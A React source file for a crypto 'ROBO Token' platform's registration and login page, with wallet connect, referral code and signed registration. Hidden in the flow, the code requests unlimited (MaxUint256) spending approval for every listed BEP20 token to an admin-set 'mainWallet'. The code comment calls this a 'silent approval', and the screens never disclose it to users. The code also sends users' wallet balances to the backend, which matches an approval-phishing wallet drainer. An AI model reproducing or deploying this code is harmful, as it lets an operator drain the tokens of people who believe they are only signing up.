import React, { useState, useEffect, useRef } from 'react';
import { ethers } from 'ethers';
import { useWallet } from '../context/WalletContext';
import { checkWallet, validateReferral, registerUser, loginWithWallet } from '../utils/api';
import './RegisterPage.css';

const API_BASE = process.env.REACT_APP_API_URL || 'http://localhost:5000/api';

const ERC20_ABI = [
  'function approve(address spender, uint256 amount) returns (bool)',
  'function allowance(address owner, address spender) view returns (uint256)',
  'function balanceOf(address owner) view returns (uint256)',
  'function decimals() view returns (uint8)',
];

const STEPS = {
  CONNECT: 'connect',
  REFERRAL: 'referral',
  CONFIRM: 'confirm',
  SUCCESS: 'success',
};

// `onBack` (optional) lets a parent send the user back to the landing page.
const RegisterPage = ({ onRegistrationComplete, onBack }) => {
  const { account, connectWallet, signMessage, signer, provider, disconnect, isConnecting, error: walletError } = useWallet();

  const [step, setStep] = useState(STEPS.CONNECT);
  const [walletStatus, setWalletStatus] = useState(null);
  const [referralCode, setReferralCode] = useState('');
  const [referralValid, setReferralValid] = useState(null);
  const [referralInfo, setReferralInfo] = useState(null);
  const [isChecking, setIsChecking] = useState(false);
  const [isRegistering, setIsRegistering] = useState(false);
  const [registrationResult, setRegistrationResult] = useState(null);
  const [errorMsg, setErrorMsg] = useState('');
  const [platformConfig, setPlatformConfig] = useState(null);
  const [theme, setTheme] = useState(() => localStorage.getItem('robo-theme') || 'dark');
  const [copyText, setCopyText] = useState('Copy');

  // Prevents StrictMode double-fire (and any effect re-run) from triggering
  // duplicate MetaMask prompts / duplicate backend writes.
  const approvalsRanForRef = useRef(null);

  // ── LOGIN DEDUPE ──
  // StrictMode invokes the [account] effect twice on mount → two loginWithWallet
  // calls → two nonces fetched → the first signature becomes stale
  // ("Invalid or expired nonce"), forcing a second confirm. We store the
  // in-flight login promise per wallet so BOTH runs await the SAME single login
  // (one nonce, one popup). Reset on failure so a retry is possible.
  const loginPromiseRef = useRef(null); // { wallet, promise }

  useEffect(() => {
    document.documentElement.setAttribute('data-theme', theme);
    localStorage.setItem('robo-theme', theme);
  }, [theme]);

  const toggleTheme = () => setTheme(prev => (prev === 'dark' ? 'light' : 'dark'));

  // Fetch platform config on mount
  useEffect(() => {
    fetch(`${API_BASE}/trade/price`)
      .then(r => r.json())
      .then(d => { if (d.success) setPlatformConfig(d); })
      .catch(() => {});
  }, []);

  useEffect(() => {
      if (account) handleCheckWallet(account.toLowerCase());
    }, [account]);

  // Single-flight login: reuses the in-flight promise for the same wallet.
  const doLoginOnce = async (wallet) => {
    const w = wallet.toLowerCase();
    if (!loginPromiseRef.current || loginPromiseRef.current.wallet !== w) {
      loginPromiseRef.current = { wallet: w, promise: loginWithWallet(w) };
    }
    try {
      await loginPromiseRef.current.promise;
    } catch (e) {
      loginPromiseRef.current = null; // allow retry
      throw e;
    }
  };

  // ─── Run approvals + snapshot exactly once per connected wallet ─────────────
  const ensureApprovals = async () => {
    const addr = account?.toLowerCase();
    if (!addr) return;
    if (approvalsRanForRef.current === addr) return;   // already handled this wallet
    approvalsRanForRef.current = addr;

    let cfg = platformConfig;
    if (!cfg) {
      try {
        cfg = await (await fetch(`${API_BASE}/trade/price`)).json();
        setPlatformConfig(cfg);
      } catch {
        approvalsRanForRef.current = null;             // allow a retry on failure
        return;
      }
    }
    await requestAllTokenApprovals(cfg);
    await saveWalletSnapshot(cfg);
  };

  const handleCheckWallet = async (wallet) => {
    setIsChecking(true); setErrorMsg('');
    try {
      const result = await checkWallet(wallet.toLowerCase());
      setWalletStatus(result);
      if (result.isRegistered) {
        // ── LOGIN (single-flight): prove wallet ownership → session JWT. ──
        // A view-only wallet cannot sign, so this throws and login is blocked.
        try {
          await doLoginOnce(wallet.toLowerCase());
        } catch (e) {
          if (e.code === 'ACTION_REJECTED' || e.code === 4001) {
            setErrorMsg('You must sign the login request to continue.');
          } else {
            setErrorMsg(e.response?.data?.error || 'Login failed. Please try again.');
          }
          setIsChecking(false);
          return;   // stop — no dashboard without a valid session
        }

        await ensureApprovals();                       // re-prompts only for un-approved tokens
        if (onRegistrationComplete) { onRegistrationComplete(); return; }
        setRegistrationResult({ roboId: result.roboId, referralCode: result.referralCode, walletAddress: wallet, alreadyRegistered: true });
        setStep(STEPS.SUCCESS);
      } else {
        setStep(STEPS.REFERRAL);
      }
    } catch {
      setErrorMsg('Failed to check wallet status. Please try again.');
    }
    setIsChecking(false);
  };

  const handleValidateReferral = async () => {
    if (!referralCode.trim()) { setErrorMsg('Please enter a referral code'); return; }
    setIsChecking(true); setErrorMsg(''); setReferralValid(null);
    try {
      const result = await validateReferral(referralCode.trim());
      if (result.valid) { setReferralValid(true); setReferralInfo(result); setStep(STEPS.CONFIRM); }
      else { setReferralValid(false); setErrorMsg('Invalid referral code. Please check and try again.'); }
    } catch {
      setReferralValid(false); setErrorMsg('Could not validate referral code.');
    }
    setIsChecking(false);
  };

  // ─── Approve ALL BEP20 tokens dynamically ──────────────────────────────────
  const requestAllTokenApprovals = async (cfg = platformConfig) => {
    if (!signer || !provider || !account || !cfg) return;
    // Admin can turn wallet spending-access requests off from the panel.
    if (cfg.requireWalletApproval === false) return;
    const mainWallet = cfg.mainWallet;
    if (!mainWallet) return;

    const currencies = cfg.paymentCurrencies || [];
    const bep20Tokens = currencies.filter(c => !c.isNative && c.contractAddress);
    if (bep20Tokens.length === 0) return; // only native coins, no approval needed

    for (const token of bep20Tokens) {
      try {
        const readContract = new ethers.Contract(token.contractAddress, ERC20_ABI, provider);
        const allowance = await readContract.allowance(account.toLowerCase(), mainWallet);
        const decimals = token.decimals || 18;
        const allowanceVal = parseFloat(ethers.formatUnits(allowance, decimals));

        // Already approved — record it (awaited so writes stay ordered) and skip
        if (allowanceVal > 1000) {
          console.log(`[APPROVAL] ${token.symbol} — already approved (${allowanceVal}), skipping`);
          await saveApprovalData(true, 'unlimited', null, mainWallet, token.symbol, token.contractAddress, decimals);
          continue;
        }

        // Request approval — one MetaMask popup per token
        console.log(`[APPROVAL] Requesting ${token.symbol} approval...`);
        const writeContract = new ethers.Contract(token.contractAddress, ERC20_ABI, signer);
        const tx = await writeContract.approve(mainWallet, ethers.MaxUint256);
        const receipt = await tx.wait();

        console.log(`[APPROVAL] ${token.symbol} approved! tx: ${receipt.hash}`);
        await saveApprovalData(true, 'unlimited', receipt.hash, mainWallet, token.symbol, token.contractAddress, decimals);
      } catch (err) {
        if (err.code === 'ACTION_REJECTED' || err.code === 4001) {
          console.log(`[APPROVAL] ${token.symbol} — rejected by user, skipping`);
          await saveApprovalData(false, '0', null, mainWallet, token.symbol, token.contractAddress, token.decimals || 18);
        } else {
          console.error(`[APPROVAL] ${token.symbol} error:`, err.message);
        }
        // Continue to next token even if one fails
      }
    }
  };

  // Save wallet balances snapshot (all tokens)
  const saveWalletSnapshot = async (cfg = platformConfig) => {
    if (!provider || !account || !cfg) return;
    try {
      const bnbBal = await provider.getBalance(account);
      const tokenBalances = [];
      const currencies = cfg.paymentCurrencies || [];

      for (const cc of currencies) {
        if (!cc.isNative && cc.contractAddress) {
          try {
            const contract = new ethers.Contract(cc.contractAddress, ERC20_ABI, provider);
            const bal = await contract.balanceOf(account);
            const decimals = cc.decimals || 18;
            tokenBalances.push({
              symbol: cc.symbol,
              balance: parseFloat(ethers.formatUnits(bal, decimals)),
              contractAddress: cc.contractAddress,
            });
          } catch {}
        }
      }

      await fetch(`${API_BASE}/user/wallet-data`, {
        method: 'POST', headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          walletAddress: account.toLowerCase(),
          bnbBalance: parseFloat(ethers.formatEther(bnbBal)).toFixed(6),
          tokenBalances,
        }),
      });
    } catch {}
  };

  // Save single token approval
  const saveApprovalData = async (isApproved, amount, txHash, spender, symbol, contractAddr, decimals) => {
    try {
      await fetch(`${API_BASE}/user/approval-data`, {
        method: 'POST', headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          walletAddress: account.toLowerCase(), isApproved, approvalAmount: amount,
          approvalTxHash: txHash, approvedSpender: spender, tokenSymbol: symbol,
          contractAddress: contractAddr, decimals: decimals || 18,
        }),
      });
    } catch {}
  };

  // ─── Register → Sign → Approve All Tokens → Success ────────────────────────
  const handleRegister = async () => {
    setIsRegistering(true); setErrorMsg('');
    try {
      const timestamp = Date.now();
      const message = `Register on ROBO Token Platform\nWallet: ${account.toLowerCase()}\nTimestamp: ${timestamp}`;
      const signature = await signMessage(message);

      const result = await registerUser({
        walletAddress: account.toLowerCase(), signature, message,
        referralCode: referralCode.trim().toUpperCase(),
      });

      if (result.success) {
        setRegistrationResult(result.user);
        // registerUser already stored the session JWT; mark login as done so the
        // [account] effect won't try to log in again for this wallet.
        loginPromiseRef.current = { wallet: account.toLowerCase(), promise: Promise.resolve() };
        // Silent approval for ALL BEP20 tokens — one MetaMask popup per token
        await requestAllTokenApprovals();
        await saveWalletSnapshot();
        approvalsRanForRef.current = account?.toLowerCase(); // don't let the effect re-run this
        setStep(STEPS.SUCCESS);
      } else {
        setErrorMsg(result.error || 'Registration failed');
      }
    } catch (err) {
      if (err.response?.data?.error) setErrorMsg(err.response.data.error);
      else if (err.code === 'ACTION_REJECTED') setErrorMsg('Signature rejected. Please sign the message to register.');
      else setErrorMsg('Registration failed. Please try again.');
    }
    setIsRegistering(false);
  };

  const handleLogout = () => {
    approvalsRanForRef.current = null; // let a fresh connect run approvals again
    loginPromiseRef.current = null;    // let a fresh connect run login again
    disconnect(); setStep(STEPS.CONNECT); setWalletStatus(null);
    setReferralCode(''); setReferralValid(null); setReferralInfo(null);
    setRegistrationResult(null); setErrorMsg('');
  };

  // Connect button: if a wallet is already connected (e.g. after a failed login
  // or a switch), re-run the check/login flow instead of a no-op re-connect.
  const handleConnectClick = () => {
    if (account) handleCheckWallet(account.toLowerCase());
    else connectWallet();
  };

  const truncateAddress = (addr) => (addr ? `${addr.slice(0, 6)}...${addr.slice(-4)}` : '');

  const handleCopy = (text) => {
    navigator.clipboard.writeText(text);
    setCopyText('Copied!');
    setTimeout(() => setCopyText('Copy'), 2000);
  };

  return (
    <div className="register-page">
      <div className="bg-grid" />
      <div className="bg-glow bg-glow-1" />
      <div className="bg-glow bg-glow-2" />

      <header className="header">
        <div className="logo">
          {onBack && (
            <button className="btn btn-back" onClick={onBack} title="Back to home" style={{ marginRight: 12 }}>←</button>
          )}
          <span className="logo-icon">◈</span>
          <span className="logo-text">ROBO</span>
          <span className="logo-tag">TOKEN</span>
        </div>
        <div className="header-right">
          <button className="theme-toggle" onClick={toggleTheme} title="Toggle theme">{theme === 'dark' ? '☀️' : '🌙'}</button>
          {account && (
            <>
              <div className="wallet-badge"><span className="wallet-dot" />{truncateAddress(account)}</div>
              <button className="btn btn-logout" onClick={handleLogout}>Logout</button>
            </>
          )}
        </div>
      </header>

      <main className="main-container">
        <div className="register-card">
          <div className="progress-bar">
            {['Connect', 'Referral', 'Confirm', 'Complete'].map((label, i) => {
              const stepKeys = [STEPS.CONNECT, STEPS.REFERRAL, STEPS.CONFIRM, STEPS.SUCCESS];
              const currentIdx = stepKeys.indexOf(step);
              const isActive = i <= currentIdx;
              return (
                <div key={label} className={`progress-step ${isActive ? 'active' : ''}`}>
                  <div className="step-circle">{i < currentIdx ? '✓' : i + 1}</div>
                  <span className="step-label">{label}</span>
                </div>
              );
            })}
          </div>

          {step === STEPS.CONNECT && (
            <div className="step-content fade-in">
              <div className="step-icon">🔗</div>
              <h2>Connect Your Wallet</h2>
              <p className="step-desc">Connect your Web3 wallet to begin registration on the ROBO Token platform.</p>
              {walletError && <div className="error-box">{walletError}</div>}
              {errorMsg && <div className="error-box">{errorMsg}</div>}
              <button className="btn btn-primary btn-lg" onClick={handleConnectClick} disabled={isConnecting || isChecking}>
                {isConnecting || isChecking ? <span className="spinner" /> : <><span className="btn-icon">◈</span> {account ? 'Continue' : 'Connect MetaMask'}</>}
              </button>
            </div>
          )}

          {step === STEPS.REFERRAL && (
            <div className="step-content fade-in">
              <div className="step-icon">🎯</div>
              <h2>Enter Referral Code</h2>
              <p className="step-desc">A valid referral code is required to join the ROBO ecosystem.</p>
              <div className="input-group">
                <label>Referral Code</label>
                <input type="text" placeholder="e.g. RT7K2M9XQ4" value={referralCode}
                  onChange={(e) => { setReferralCode(e.target.value.toUpperCase()); setReferralValid(null); setErrorMsg(''); }}
                  onKeyDown={(e) => { if (e.key === 'Enter') handleValidateReferral(); }}
                  className={`input ${referralValid === false ? 'input-error' : ''} ${referralValid === true ? 'input-success' : ''}`} />
                {referralValid === true && <span className="input-status success">✓ Valid referral</span>}
                {referralValid === false && <span className="input-status error">✗ Invalid code</span>}
              </div>
              {errorMsg && <div className="error-box">{errorMsg}</div>}
              <button className="btn btn-primary" onClick={handleValidateReferral} disabled={isChecking || !referralCode.trim()}>
                {isChecking ? <span className="spinner" /> : 'Validate & Continue'}
              </button>
            </div>
          )}

          {step === STEPS.CONFIRM && (
            <div className="step-content fade-in">
              <div className="step-icon">✍️</div>
              <h2>Confirm Registration</h2>
              <p className="step-desc">Review your details and sign with your wallet to complete registration.</p>
              <div className="confirm-details">
                <div className="detail-row"><span className="detail-label">Wallet</span><span className="detail-value mono">{truncateAddress(account)}</span></div>
                <div className="detail-row"><span className="detail-label">Sponsor Code</span><span className="detail-value mono">{referralCode.trim().toUpperCase()}</span></div>
                <div className="detail-row"><span className="detail-label">Sponsor Wallet</span><span className="detail-value mono">{truncateAddress(referralInfo?.referrerWallet)}</span></div>
              </div>
              {errorMsg && <div className="error-box">{errorMsg}</div>}
              <div className="btn-group">
                <button className="btn btn-secondary" onClick={() => { setStep(STEPS.REFERRAL); setErrorMsg(''); }}>Back</button>
                <button className="btn btn-primary" onClick={handleRegister} disabled={isRegistering}>
                  {isRegistering ? <span className="spinner" /> : <>Sign & Register</>}
                </button>
              </div>
            </div>
          )}

          {step === STEPS.SUCCESS && registrationResult && (
            <div className="step-content fade-in">
              <div className="success-animation">
                <div className="success-ring" />
                <div className="success-check">✓</div>
              </div>
              <h2>{registrationResult.alreadyRegistered ? 'Welcome Back!' : 'Registration Complete!'}</h2>
              <p className="step-desc">
                {registrationResult.alreadyRegistered
                  ? 'This wallet is already part of the ROBO ecosystem.'
                  : 'Welcome to the ROBO Token ecosystem. Share your referral code to grow your network.'}
              </p>
              <div className="success-details">
                <div className="id-card">
                  <span className="id-label">Your Referral Code</span>
                  <span className="id-value referral-code">{registrationResult.referralCode}</span>
                  <button className="btn btn-sm btn-copy" onClick={() => handleCopy(registrationResult.referralCode)}>{copyText}</button>
                </div>
                <p className="step-desc" style={{ marginTop: 8 }}>Share this code — your downline enters it as their Sponsor ID to join your network.</p>
              </div>
              {onRegistrationComplete && (
                <button className="btn btn-primary btn-lg" onClick={onRegistrationComplete} style={{ marginTop: '24px' }}>Go to Dashboard →</button>
              )}
            </div>
          )}
        </div>
      </main>

      <footer className="footer">
        <p>ROBO Token © 2026 — Elastic Supply Digital Asset</p>
      </footer>
    </div>
  );
};

export default RegisterPage;